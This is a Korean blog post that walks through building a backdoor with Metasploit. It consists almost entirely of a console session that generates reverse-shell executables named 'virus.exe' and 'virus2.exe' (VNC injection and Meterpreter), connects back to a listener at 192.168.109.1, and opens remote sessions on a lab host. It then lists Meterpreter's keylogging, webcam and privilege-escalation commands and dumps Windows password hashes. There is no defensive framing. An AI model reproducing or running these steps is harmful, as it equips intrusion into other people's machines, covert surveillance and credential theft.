Metasploit을 이용한 백도어 생성

 =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 =[ svn r12644 updated today (2011.05.17)

msf > show payloads

Payloads
========

 Name Disclosure Date Rank Description
---- --------------- ---- -----------
 aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
 aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
 aix/ppc/shell_interact normal AIX execve shell for inetd
 aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
 bsd/sparc/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/sparc/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsd/x86/exec normal BSD Execute Command
 bsd/x86/metsvc_bind_tcp normal FreeBSD Meterpreter Service, Bind TCP
 bsd/x86/metsvc_reverse_tcp normal FreeBSD Meterpreter Service, Reverse TCP Inline
 bsd/x86/shell/bind_tcp normal BSD Command Shell, Bind TCP Stager
 bsd/x86/shell/find_tag normal BSD Command Shell, Find Tag Stager
 bsd/x86/shell/reverse_tcp normal BSD Command Shell, Reverse TCP Stager
 bsd/x86/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/x86/shell_find_port normal BSD Command Shell, Find Port Inline
 bsd/x86/shell_find_tag normal BSD Command Shell, Find Tag Inline
 bsd/x86/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsdi/x86/shell/bind_tcp normal BSDi Command Shell, Bind TCP Stager
 bsdi/x86/shell/reverse_tcp normal BSDi Command Shell, Reverse TCP Stager
 bsdi/x86/shell_bind_tcp normal BSDi Command Shell, Bind TCP Inline
 bsdi/x86/shell_find_port normal BSDi Command Shell, Find Port Inline
 bsdi/x86/shell_reverse_tcp normal BSDi Command Shell, Reverse TCP Inline
 cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
 cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
 cmd/unix/generic normal Unix Command, Generic command execution
 cmd/unix/interact normal Unix Command, Interact with established connection
 cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
 cmd/unix/reverse_bash normal Unix Command Shell, Reverse TCP (/dev/tcp)
 cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
 cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
 cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
 cmd/windows/adduser normal Windows Execute net user /ADD CMD
 cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via perl)
 cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby)
 cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs)
 cmd/windows/reverse_perl normal Windows Command, Double reverse TCP connection (via perl)
 cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
 generic/debug_trap normal Generic x86 Debug Trap
 generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
 generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
 generic/tight_loop normal Generic x86 Tight Loop
 java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline
 java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
 java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP stager
 java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP stager
 java/shell/bind_tcp normal Command Shell, Java Bind TCP stager
 java/shell/reverse_tcp normal Command Shell, Java Reverse TCP stager
 linux/armle/adduser normal Linux Add User
 linux/armle/exec normal Linux Execute Command
 linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc64/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/adduser normal Linux Add User
 linux/x86/chmod normal Linux Chmod
 linux/x86/exec normal Linux Execute Command
 linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
 linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
 linux/x86/meterpreter/find_tag normal Linux Meterpreter, Find Tag Stager
 linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
 linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
 linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
 linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
 linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
 linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
 linux/x86/shell/find_tag normal Linux Command Shell, Find Tag Stager
 linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
 linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
 linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
 linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/x86/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/x86/shell_find_tag normal Linux Command Shell, Find Tag Inline
 linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm demo
 netware/shell/reverse_tcp normal NetWare Command Shell, Reverse TCP Stager
 osx/armle/execute/bind_tcp normal OSX Write and Execute Binary, Bind TCP Stager
 osx/armle/execute/reverse_tcp normal OSX Write and Execute Binary, Reverse TCP Stager
 osx/armle/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/armle/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/armle/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/armle/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/armle/vibrate normal OSX iPhone Vibrate
 osx/ppc/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/ppc/shell/find_tag normal OSX Command Shell, Find Tag Stager
 osx/ppc/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/ppc/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/ppc/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/bundleinject/bind_tcp normal Mac OS X Inject Mach-O Bundle, Bind TCP Stager
 osx/x86/bundleinject/reverse_tcp normal Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
 osx/x86/exec normal OSX Execute Command
 osx/x86/isight/bind_tcp normal Mac OS X x86 iSight photo capture, Bind TCP Stager
 osx/x86/isight/reverse_tcp normal Mac OS X x86 iSight photo capture, Reverse TCP Stager
 osx/x86/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/x86/shell_find_port normal OSX Command Shell, Find Port Inline
 osx/x86/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/vforkshell/bind_tcp normal OSX (vfork) Command Shell, Bind TCP Stager
 osx/x86/vforkshell/reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Stager
 osx/x86/vforkshell_bind_tcp normal OSX (vfork) Command Shell, Bind TCP Inline
 osx/x86/vforkshell_reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Inline
 php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
 php/bind_php normal PHP Command Shell, Bind TCP (via php)
 php/download_exec normal PHP Executable Download and Execute
 php/exec normal PHP Execute Command
 php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
 php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
 php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
 php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
 php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
 php/shell_findsock normal PHP Command Shell, Find Sock
 solaris/sparc/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/sparc/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/sparc/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 solaris/x86/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/x86/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/x86/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 tty/unix/interact normal Unix TTY, Interact with established connection
 windows/adduser normal Windows Execute net user /ADD
 windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
 windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
 windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
 windows/dllinject/find_tag normal Reflective Dll Injection, Find Tag Ordinal Stager
 windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
 windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
 windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
 windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
 windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
 windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
 windows/download_exec normal Windows Executable Download and Execute
 windows/exec normal Windows Execute Command
 windows/messagebox normal Windows MessageBox
 windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
 windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
 windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
 windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
 windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
 windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
 windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
 windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
 windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
 windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
 windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
 windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
 windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager
 windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
 windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
 windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
 windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
 windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
 windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
 windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt injection), Find Tag Ordinal Stager
 windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
 windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
 windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
 windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
 windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
 windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
 windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
 windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager
 windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
 windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
 windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
 windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
 windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
 windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
 windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
 windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
 windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
 windows/speak_pwned normal Windows Speech API - Say You Got Pwned!
 windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
 windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
 windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
 windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager
 windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
 windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
 windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
 windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
 windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
 windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
 windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
 windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
 windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager
 windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
 windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
 windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
 windows/x64/exec normal Windows x64 Execute Command
 windows/x64/meterpreter/bind_tcp normal Windows x64 Meterpreter, Windows x64 Bind TCP Stager
 windows/x64/meterpreter/reverse_tcp normal Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
 windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager
 windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager
 windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline
 windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
 windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
 windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > use windows/vncinject/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/vncinject/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 AUTOVNC true yes Automatically launch VNC viewer if present
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST yes The listen address
 LPORT 4444 yes The listen port
 VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
 VNCPORT 5900 yes The local port to use for the VNC proxy

msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

 -E Force encoding.
 -b <opt> The list of characters to avoid: '\x00\xff'
 -e <opt> The name of the encoder module to use.
 -f <opt> The output file name (otherwise stdout)
 -h Help banner.
 -i <opt> the number of encoding iterations.
 -k Keep the template executable functional
 -o <opt> A comma separated list of options in VAR=VAL format.
 -p <opt> The Platform for output.
 -s <opt> NOP sled length.
 -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
 -x <opt> The executable template to use

msf payload(reverse_tcp) > generate -f virus.exe -t exe
[*] Writing 73802 bytes to virus.exe...
msf payload(reverse_tcp) > ls -al virus.exe
[*] exec: ls -al virus.exe

-rwx------+ 1 ByJJoon None 73802 May 18 06:38 virus.exe
msf payload(reverse_tcp) > file virus.exe
[*] exec: file virus.exe

virus.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

 Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/vncinject/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 AUTOVNC true yes Automatically launch VNC viewer if present
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST yes The listen address
 LPORT 4444 yes The listen port
 VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
 VNCPORT 5900 yes The local port to use for the VNC proxy

Exploit target:

 Id Name
-- ----
 0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to 192.168.109.128
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(handler) >

msf exploit(handler) > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/meterpreter/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST yes The listen address
 LPORT 4444 yes The listen port

msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -f virus2.exe -t exe
[*] Writing 73802 bytes to virus2.exe...
msf payload(reverse_tcp) > ls -al virus2.exe
[*] exec: ls -al virus2.exe

-rwx------+ 1 ByJJoon None 73802 May 18 06:50 virus2.exe
msf payload(reverse_tcp) > file virus2.exe
[*] exec: file virus2.exe

virus2.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

 Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

 Name Current Setting Required Description
---- --------------- -------- -----------
 EXITFUNC process yes Exit technique: seh, thread, process, none
 LHOST 192.168.109.1 yes The listen address
 LPORT 4444 yes The listen port

Exploit target:

 Id Name
-- ----
 0 Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.109.128
[*] Meterpreter session 2 opened (192.168.109.1:4444 -> 192.168.109.128:1074) at 2011-05-18 06:51:23 +0900

meterpreter > help

Core Commands
=============

 Command Description
------- -----------
 ? Help menu
 background Backgrounds the current session
 bgkill Kills a background meterpreter script
 bglist Lists running background scripts
 bgrun Executes a meterpreter script as a background thread
 channel Displays information about active channels
 close Closes a channel
 exit Terminate the meterpreter session
 help Help menu
 info Displays information about a Post module
 interact Interacts with a channel
 irb Drop into irb scripting mode
 load Load one or more meterpreter extensions
 migrate Migrate the server to another process
 quit Terminate the meterpreter session
 read Reads data from a channel
 resource Run the commands stored in a file
 run Executes a meterpreter script or Post module
 use Deprecated alias for 'load'
 write Writes data to a channel

Stdapi: File system Commands
============================

 Command Description
------- -----------
 cat Read the contents of a file to the screen
 cd Change directory
 del Delete the specified file
 download Download a file or directory
 edit Edit a file
 getlwd Print local working directory
 getwd Print working directory
 lcd Change local working directory
 lpwd Print local working directory
 ls List files
 mkdir Make directory
 pwd Print working directory
 rm Delete the specified file
 rmdir Remove directory
 search Search for files
 upload Upload a file or directory

Stdapi: Networking Commands
===========================

 Command Description
------- -----------
 ipconfig Display interfaces
 portfwd Forward a local port to a remote service
 route View and modify the routing table

Stdapi: System Commands
=======================

 Command Description
------- -----------
 clearev Clear the event log
 drop_token Relinquishes any active impersonation token.
 execute Execute a command
 getpid Get the current process identifier
 getprivs Attempt to enable all privileges available to the current process
 getuid Get the user that the server is running as
 kill Terminate a process
 ps List running processes
 reboot Reboots the remote computer
 reg Modify and interact with the remote registry
 rev2self Calls RevertToSelf() on the remote machine
 shell Drop into a system command shell
 shutdown Shuts down the remote computer
 steal_token Attempts to steal an impersonation token from the target process
 sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

 Command Description
------- -----------
 enumdesktops List all accessible desktops and window stations
 getdesktop Get the current meterpreter desktop
 idletime Returns the number of seconds the remote user has been idle
 keyscan_dump Dump the keystroke buffer
 keyscan_start Start capturing keystrokes
 keyscan_stop Stop capturing keystrokes
 screenshot Grab a screenshot of the interactive desktop
 setdesktop Change the meterpreters current desktop
 uictl Control some of the user interface components

Stdapi: Webcam Commands
=======================

 Command Description
------- -----------
 record_mic Record audio from the default microphone for X seconds
 webcam_list List webcams
 webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

 Command Description
------- -----------
 getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

 Command Description
------- -----------
 hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

 Command Description
------- -----------
 timestomp Manipulate file MACE attributes

meterpreter > hashdump
Administrator:500:6c36913468365950aad3b435b51404ee:711161255cd9560e884378d0e28a5027:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a51f93e4803b68166e1cee91c7744d1f:7d28b6b112e8f84513b8d1e3aa40d1a7:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:35db8a26c8621e45b0ef24a043665a23:::
Test:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다